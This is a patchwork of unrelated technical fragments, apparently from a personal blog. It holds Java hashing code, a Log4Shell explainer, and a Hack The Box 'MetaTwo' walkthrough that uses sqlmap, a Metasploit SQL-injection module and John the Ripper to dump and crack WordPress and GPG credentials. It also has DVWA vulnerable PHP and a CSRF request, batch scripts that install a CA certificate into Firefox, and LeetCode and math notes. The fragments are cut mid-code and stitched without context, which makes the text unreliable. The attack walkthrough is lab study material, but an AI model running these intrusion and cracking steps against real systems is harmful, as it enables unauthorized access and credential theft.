    String hashType = crypted.substring(1, typeEnd);
    String hashed = crypted.substring(typeEnd + 1);
    MessageDigest messagedigest = getMessageDigest(hashType);
    messagedigest.update(bytes);
    byte[] digestBytes = messagedigest.digest();
    char[] digestChars = Hex.encodeHex(digestBytes);
    String checkCrypted = new String(digestChars);
    if (hashed.equals(checkCrypted)) {
        return true;
    }
    // This next block should be removed when all {prefix}oldFunnyHex are fixed.
    if (hashed.equals(oldFunnyHex(digestBytes))) {
        Debug.logWarning("Warning: detected oldFunnyHex password prefixed with a hashType; this is not valid, please update the value in the database with ({%s}%s)", module, hashType, checkCrypted);
        return true;
    }
    return false;
}
```

```java
/*
 * @deprecated use cryptBytes(hashType, salt, password); eventually, use
 * cryptUTF8(hashType, salt, password) after all existing installs are
 * salt-based. If the call-site of cryptPassword is just used to create a *new*
 * value, then you can switch to cryptUTF8 directly.
 */
@Deprecated
public static String cryptPassword(String hashType, String salt, String password) {
    if (hashType.startsWith("PBKDF2")) {
        return password != null ? pbkdf2HashCrypt(hashType, salt, password) : null;
    }
    return password != null ? cryptBytes(hashType, salt, password.getBytes(UtilIO.getUtf8())) : null;
}
```

```java
        messagedigest.update(strBytes);
        return oldFunnyHex(messagedigest.digest());
    } catch (Exception e) {
        Debug.logError(e, "Error while computing hash of type " + hashType, module);
    }
    return str;
}
```

```java
// This next block should be removed when all {prefix}oldFunnyHex are fixed.
private static String oldFunnyHex(byte[] bytes) {
    int k = 0;
    char[] digestChars = new char[bytes.length * 2];
    for (byte b : bytes) {
        int i1 = b;
```
```
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
```
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed.
```mermaid
graph LR
    A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?}
    C -->|Yes| D[Execute<br>JNDI lookup]
    C -->|No| E[Normal log]
    D --> F[Connect to<br>attacker's server]
    F --> G[Download &<br>execute<br>malicious codes]
    G --> H[Attacker gains<br>server control]
```
Incident Timeline
```mermaid
timeline
    title Log4j Vulnerability Incident Timeline
    November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache
    December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0)
    December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware
    December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert
    December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack
    December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability
```
Mitigations
The Log4j vulnerability, also known as **Log4Shell (CVE-2021-44228)**, is a critical remote code execution (RCE) vulnerability affecting Apache Log4j 2. It lets an attacker make the server download and execute malicious code by getting a malicious JNDI (Java Naming and Directory Interface) lookup string into logged input.
```text
┌──(root@kali)-[/home/h4m5t/Desktop/HTB]
└─# nmap -sV $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining)
Nmap scan report for 10.129.231.241
Host is up (0.0093s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
```
If we browse to http://$IP we are redirected to http://metapress.htb, so we need to add this domain to /etc/hosts.
```text
[15:30:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.24, Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:30:38] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema

[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'

[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv'
[15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
```
```text
   #  Name                                                     Disclosure Date  Rank    Check  Description
   -  ----                                                     ---------------  ----    -----  -----------
   0  auxiliary/gather/wp_bookingpress_category_services_sqli  2022-02-28       normal  Yes    Wordpress BookingPress bookingpress_front_get_category_services SQLi


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli

msf6 > use 0
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb
RHOST => metapress.htb
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/
TARGETURI => /events/
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 10.129.231.241

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
Wordpress User Credentials
==========================
```
```text
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt user.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
partylikearockstar (manager)
```

```text
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# ftp metapress.htb@$IP
Connected to 10.129.231.241.
220 ProFTPD Server (Debian) [::ffff:10.129.231.241]
331 Password required for metapress.htb
Password:
230 User metapress.htb logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash. Running john then fails with this error:

```text
Crash recovery file is locked: /root/.john/john.rec
```

Fix:

```bash
rm /root/.john/john.rec
```

Start cracking:

```text
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john -wordlist=/usr/share/wordlists/rockyou.txt key.hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182         (Passpie)
1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
```text
COMMANDS:
   webscan, ws        Run a webscan task
   servicescan, ss    Run a service scan task
   subdomain, sd      Run a subdomain task
   poclint, pl, lint  lint yaml poc
   burp-gamma, btg    Convert the export file of burp historical proxy records to POC format
   transform          transform other script to gamma
   reverse            Run a standalone reverse server
   convert            convert results from json to html or from html to json
   genca              GenerateToFile CA certificate and key
   upgrade            check new version and upgrade self if any updates found
   version            Show version info
   x                  A command that enables all plugins. You can customize new commands or modify the plugins enabled by a command in the configuration file.
   help, h            Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --config FILE      Load configuration from FILE (default: "config.yaml")
   --log-level value  Log level, choices are debug, info, warn, error, fatal
   --help, -h         show help
[INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml

OPTIONS:
   --list, -l                                    list plugins
   --plugins value, --plugin value, --plug value specify the plugins to run, separated by ','
   --poc value, -p value                         specify the poc to run, separated by ','
   --level value                                 specify the level of poc to run, separated by ','
   --tags value                                  specify the level of poc to run, separated by ','

   --listen value                                use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111)
   --basic-crawler value, --basic value          use a basic spider to crawl the target and scan the requests
   --browser-crawler value, --browser value      use a browser spider to crawl the target and scan the requests
   --url-file value, --uf value                  read urls from a local file and scan these urls, one url per line
   --burp-file value, --bf value                 read requests from burpsuite exported file as targets
   --url value, -u value                         scan a **single** url
   --data value, -d value                        data string to be sent through POST (e.g. 'username=admin')
   --raw-request FILE, --rr FILE                 load http raw request from a FILE
   --force-ssl, --fs                             force usage of SSL/HTTPS for raw-request

   --json-output FILE, --jo FILE                 output xray results to FILE in json format
   --html-output FILE, --ho FILE                 output xray result to FILE in HTML format
   --webhook-output value, --wo value            post xray result to url in json format
```
```text
[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml

Enabled plugins: [phantasm]

[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details)
[INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/

[Vuln: phantasm]
Target           "http://example.com/"
VulnType         "poc-yaml-jumpserver-session-replay-unauth/default"
Author           "Chaitin"
Links            ["https://stack.chaitin.com/techblog/detail/156"]

[*] All pending requests have been scanned
[*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00%
[INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done
```
```text
C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H
-A              Add a certificate to the database (create if needed)
-E              Add an Email certificate to the database (create if needed)
   -n cert-name      Specify the nickname of the certificate to add
   -t trustargs      Set the certificate trust attributes:
                        p    valid peer
                        P    trusted peer (implies p)
                        c    valid CA
                        T    trusted CA to issue client certs (implies c)
                        C    trusted CA to issue server certs (implies c)
                        u    user cert
                        w    send warning
                        g    make step-up cert
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -a                The input certificate is encoded in ASCII (RFC1113)
   -i input          Specify the certificate file (default is stdin)

-C              Create a new binary certificate from a BINARY cert request
   -c issuer-name    The nickname of the issuer cert
   -i cert-request   The BINARY certificate request file
   -o output-cert    Output binary cert to this file (default is stdout)
   -x                Self sign
   -m serial-number  Cert serial number
   -w warp-months    Time Warp
   -v months-valid   Months valid (default is 3)
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -1                Create key usage extension
   -2                Create basic constraint extension
   -3                Create authority key ID extension
   -4                Create crl distribution point extension
   -5                Create netscape cert type extension
   -6                Create extended key usage extension
   -7                Create an email subject alt name extension
   -8                Create an dns subject alt name extension

-G              Generate a new key pair
   -h token-name     Name of token in which to generate key (default is internal)
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -g key-size       Key size in bits, (min 512, max 2048, default 1024)
   -y exp            Set the public exponent value (3, 17, 65537) (rsa only)
   -f password-file  Specify the password file
   -z noisefile      Specify the noise file to be used
   -q pqgfile        read PQG value from pqgfile (dsa only)
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-D              Delete a certificate from the database
   -n cert-name      The nickname of the cert to delete
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-U              List all modules
   -d moddir         Module database directory (default is '~/.netscape')
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-K              List all keys
   -h token-name     Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens)
   -k key-type       Type of key pair to list ("all", "dsa", "rsa" (default))
   -f password-file  Specify the password file
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-L              List all certs, or print out a single named cert
   -n cert-name      Pretty print named cert (list all if unspecified)
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W
   -r                For single cert, print binary DER encoding
   -a                For single cert, print ASCII encoding (RFC1113)

-M              Modify trust attributes of certificate
   -n cert-name      The nickname of the cert to modify
   -t trustargs      Set the certificate trust attributes (see -A above)
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-N              Create a new certificate database
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-T              Reset the Key database or token
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -h token-name     Token to reset (default is internal)

-O              Print the chain of a certificate
   -n cert-name      The nickname of the cert to modify
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-R              Generate a certificate request (stdout)
   -s subject        Specify the subject name (using RFC1485)
   -o output-req     Output the cert request to this file
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name     Name of token in which to generate key (default is internal)
   -g key-size       Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile        Name of file containing PQG parameters (dsa only)
   -f pwfile         Specify the password file
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -p phone          Specify the contact phone number ("123-456-7890")
   -a                Output the cert request in ASCII (RFC1113); default is binary

-V              Validate a certificate
   -n cert-name      The nickname of the cert to Validate
   -b time           validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]")
   -e                Check certificate signature
   -u certusage      Specify certificate usage:
                        C    SSL Client
                        V    SSL Server
                        S    Email signer
                        R    Email Recipient
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-S              Make a certificate and add to database
   -n key-name       Specify the nickname of the cert
   -s subject        Specify the subject name (using RFC1485)
   -c issuer-name    The nickname of the issuer cert
   -t trustargs      Set the certificate trust attributes (see -A above)
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name     Name of token in which to generate key (default is internal)
   -g key-size       Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile        Name of file containing PQG parameters (dsa only)
   -x                Self sign
   -m serial-number  Cert serial number
   -w warp-months    Time Warp
   -v months-valid   Months valid (default is 3)
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -p phone          Specify the contact phone number ("123-456-7890")
   -1                Create key usage extension
   -2                Create basic constraint extension
   -3                Create authority key ID extension
   -4                Create crl distribution point extension
   -5                Create netscape cert type extension
   -6                Create extended key usage extension
   -7                Create an email subject alt name extension
   -8                Create an dns subject alt name extension
```
```bat
@echo off
rem Enable delayed variable expansion
setlocal EnableExtensions EnableDelayedExpansion

echo ###checking new_version###
echo --------------------------
set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"
set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"
set regKey="CurrentVersion"
set regValue=""

set Value1="checkversion"

rem Check whether the new-version registry key exists
reg query %regPath1% >nul 2>nul
echo %errorlevel%
echo !errorlevel!
if %errorlevel%==0 (
    echo new_version Registry key %regkey% exists.
    for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (
        if "%regValue%"=="" (
            echo value not exists
        ) else (
            set Value1=%%b
        )
    )
) else (
    echo new_version Registry key %regkey% does not exist.
    echo --------------------------
    rem Check whether the old-version registry path exists
    echo ###checking old_version###
    reg query %regPath2% >nul 2>nul
    if !errorlevel!==0 (
        echo old_version Registry key %regkey% exists.
        for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (
            if "%regValue%"=="" (
                echo value not exists
            ) else (
                set Value1=%%b
            )
        )
    ) else (
        echo old_version Registry key %regkey% does not exist.
        set Value1=0.0.0
    )
    echo !Value1!
    echo %Value1%
    rem Split "Major.Minor.Revision" on the dots; Major gets the first component
    set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
    echo Majorold: %Major%
)

echo !Value1!
echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
echo Majornew: %Major%

rem Check the version number (the original compared an undefined %final_version%; Major is 0 when the fallback 0.0.0 was used)
if %Major% EQU 0 (
    echo Program version is 0. Exiting script...
    exit /b 1
) else if %Major% LSS 49 (
    call :function1
) else (
    call :function2
)

rem Leave the script
exit /b

:function1
echo Program version is less than 49. Executing function 1...
rem Function 1: on Firefox versions below 49, update the cert8.db certificate store.

rem Show the certificates already in the db
set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"
set default_name=""
rem Check whether the certificate database path exists
IF EXIST "%db_path%" (
    echo default_path exists
    rem Add the commands to run here
    set "count=0"
    for /d %%i in ("%db_path%\*") do (
        set /a count+=1
        set "folder=%%~nxi"
    )
    rem Check that *.default is the only folder
    if !count! equ 1 (
        set default_name=!folder!
        set "all_path=%db_path%!default_name!"
        rem Show the full path of the default folder
        echo !all_path!
        rem Show the certificate store before the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
        rem Update the certificate store
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path!
        rem Show the certificate store after the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
    ) else (
        echo no or more
    )
) ELSE (
    echo no
)
goto :eof

:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem Function 2: on Firefox 49 and above, enable security.enterprise_roots.enabled

set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg
set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg%" (
        copy "%source_file_cfg%" "%dest_dir_cfg%"
    ) else (
        echo Directory %dest_dir_cfg% does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg_x86%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg_x86%" (
        copy "%source_file_cfg%" "%dest_dir_cfg_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set source_file_js=C:\firefoxinstallcert\local-settings.js
set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js%" (
        copy "%source_file_js%" "%dest_dir_js%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)

set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js_x86%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js_x86%" (
        copy "%source_file_js%" "%dest_dir_js_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)
```
The second variant of the script is identical up to :function2; its :function2 instead enables security.enterprise_roots.enabled by copying a user.js file into the Firefox profile directory:

```bat
:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem Function 2: on Firefox 49 and above, enable security.enterprise_roots.enabled by adding a user.js configuration file

rem Default profiles directory
set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles"
rem Look for the folder whose name contains "default", i.e. the profile folder
set "searchString=default"
set source_user_js=C:\firefoxinstallcert\user.js
rem Copy user.js into the profile directory
IF EXIST "%parentFolder%" (
    for /d %%F in ("%parentFolder%\*") do (
        echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1
        if errorlevel 1 (
            echo default Folder not found.
        ) else (
            echo default Folder found.
            rem Build the full path
            set "all_default_path=%parentFolder%\%%~nxF"
            echo !all_default_path!
            copy "%source_user_js%" "!all_default_path!"
        )
    )
) ELSE (
    echo no
)
goto :eof
pause
```
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
```mermaid
sequenceDiagram
    Frontend->>Frontend: user opens the frontend page for the first time
    Frontend->>Backend: version : 0, request data sync
    Backend->>Frontend: return the data together with the largest version
    note right of Backend: returned data structure: {"version":100, data:[{},{},{}]}
```
- SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections
- Blind SQL and Blind OS Command injection
- Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
- Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
- Cross-Site Request Forgery (CSRF)
- AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
- Malicious, unrestricted file uploads and backdoor files
- Authentication, authorization and session management issues
- Arbitrary file access and directory traversals
- Local and remote file inclusions (LFI/RFI)
- Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,...
- HTTP parameter pollution and HTTP response splitting
- Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
- Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
- HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
- Unvalidated redirects and forwards, and cookie poisoning
- Cookie poisoning and insecure cryptographic storage
- Server Side Request Forgery (SSRF)
- XML External Entity attacks (XXE)
- And much much much more…
```php
// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];
```

The code checks the Referer header against the server name:

```http
GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1
Host: 49.232.78.252:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Referer: http://49.232.78.252:81/vulnerabilities/csrf/
Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium
Upgrade-Insecure-Requests: 1
```
```php
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
    ( $uploaded_size < 100000 ) ) {

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
else {
    // Invalid file
    echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
```
```php
// Check CAPTCHA from 3rd party
$resp = recaptcha_check_answer(
    $_DVWA[ 'recaptcha_private_key'],
    $_POST['g-recaptcha-response']
);

// Did the CAPTCHA fail?
if( !$resp ) {
    // What happens when the CAPTCHA was entered incorrectly
    $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
    $hide_form = false;
    return;
}
else {
    // CAPTCHA was correct. Do both new passwords match?
    if( $pass_new == $pass_conf ) {
        // Show next stage for the user
        echo "
            <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
            <form action=\"#\" method=\"POST\">
                <input type=\"hidden\" name=\"step\" value=\"2\" />
                <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
                <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
                <input type=\"submit\" name=\"Change\" value=\"Change\" />
            </form>";
    }
    else {
        // Both new passwords do not match.
        $html     .= "<pre>Both passwords must match.</pre>";
        $hide_form = false;
    }
}
}
```
```php
// Check to see if both password match
if( $pass_new == $pass_conf ) {
    // They do!
    $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_new = md5( $pass_new );

    // Feedback for the end user
    echo "<pre>Password Changed.</pre>";
}
else {
    // Issue with the passwords matching
    echo "<pre>Passwords did not match.</pre>";
    $hide_form = false;
}
```
```php
?>
<?php
if (isset ($_POST['include'])) {
    $page[ 'body' ] .= "
        " . $_POST['include'] . "
    ";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';
```
Recursive method:

```python
from typing import List


class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        m = len(matrix)
        if m == 0 or len(matrix[0]) == 0:
            return []
        n = len(matrix[0])
        # Copy the first row so the caller's matrix is not mutated
        newlist = list(matrix[0])
        if m > 1:
            # Right column, rows 1..m-1
            for i in range(1, m):
                newlist.append(matrix[i][n - 1])
            # Bottom row, right to left (the bottom-right corner is already in)
            for j in range(n - 2, -1, -1):
                newlist.append(matrix[m - 1][j])
            # Left column, bottom to top, excluding both corners
            # (rows m-2 .. 1; the original used n-2 here, which is wrong for non-square input)
            if n > 1:
                for i in range(m - 2, 0, -1):
                    newlist.append(matrix[i][0])
        # Inner sub-matrix: rows 1..m-2, columns 1..n-2
        M = []
        for k in range(1, m - 1):
            t = matrix[k][1:-1]
            M.append(t)
        # Recurse on the inner matrix and append its spiral order
        newlist.extend(self.spiralOrder(M))
        return newlist
```
Clearer method (explicit boundaries):

```python
from typing import List


class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        res = []
        if len(matrix) == 0:
            return []
        # Define the four boundaries
        left = 0
        right = len(matrix[0]) - 1
        top = 0
        bottom = len(matrix) - 1
        # Walk one full ring while the boundaries have not crossed
        while top < bottom and left < right:
            for i in range(left, right):
                res.append(matrix[top][i])
            for i in range(top, bottom):
                res.append(matrix[i][right])
            for i in range(right, left, -1):
                res.append(matrix[bottom][i])
            for i in range(bottom, top, -1):
                res.append(matrix[i][left])
            left += 1
            top += 1
            right -= 1
            bottom -= 1
        # If a single row or a single column remains, take it in one pass
        if top == bottom:
            for i in range(left, right + 1):
                res.append(matrix[top][i])
        elif left == right:
            for i in range(top, bottom + 1):
                res.append(matrix[i][left])
        return res
```
Any polynomial can be written as f(x) = q(x)g(x) + r(x); r(x) is called the remainder, r(x) = f(x) mod g(x).
If there is no remainder, g(x) divides f(x), written g(x) | f(x).
If f(x) has no factors other than itself and 1, f(x) is called an irreducible polynomial (also a prime polynomial).
The polynomials with coefficients in GF(p), reduced modulo an irreducible polynomial, form a field.
Euclidean algorithm
a can be written as a = kb + r (a, b, k, r all positive integers, r < b), so r = a mod b.
Suppose d is a common divisor of a and b, written d|a, d|b, i.e. both a and b are divisible by d.
Since r = a - kb, dividing both sides by d gives r/d = a/d - kb/d = m; the right-hand side shows m is an integer, so d|r.
Hence d is also a common divisor of b and a mod b.
Conversely, suppose d is a common divisor of b and a mod b; then d|b and d|(a - k*b) with k an integer, so d|a, and d is also a common divisor of a and b.
Therefore (a, b) and (b, a mod b) have the same common divisors, so their greatest common divisors are equal. QED.

Any integer that divides both a and b also divides a - b (and b); so if we take that integer to be gcd(a,b), it can be no larger than the greatest common divisor of a - b and b: gcd(a,b) <= gcd(a-b,b).
Likewise, any integer that divides a - b and b also divides a and b; so taking it to be gcd(a-b,b), it can be no larger than the greatest common divisor of a and b: gcd(a-b,b) <= gcd(a,b).
Hence gcd(a,b) = gcd(a-b,b).
Since there is always an integer n with a - n*b = a mod b, iterating gives gcd(a-b,b) = gcd(a-2b,b) = ... = gcd(a-n*b,b) = gcd(a mod b,b).
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
It does not depend on a browser, so you can even run it on Node.js.
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Notice that the solution set must not contain duplicate triplets.
```python
import argparse

# Build the parser the two options are registered on
parser = argparse.ArgumentParser()
parser.add_argument("--square", help="display a square of a given number", type=int)
parser.add_argument("--cubic", help="display a cubic of a given number", type=int)
```
```matlab
%% extract watermark
FA2 = fft2(FAO);
G = (FA2 - FA) / alpha;
GG = G;
for i = 1:imsize(1)*0.5
    for j = 1:imsize(2)
        GG(M(i), N(j), :) = G(i, j, :);
    end
end
for i = 1:imsize(1)*0.5
    for j = 1:imsize(2)
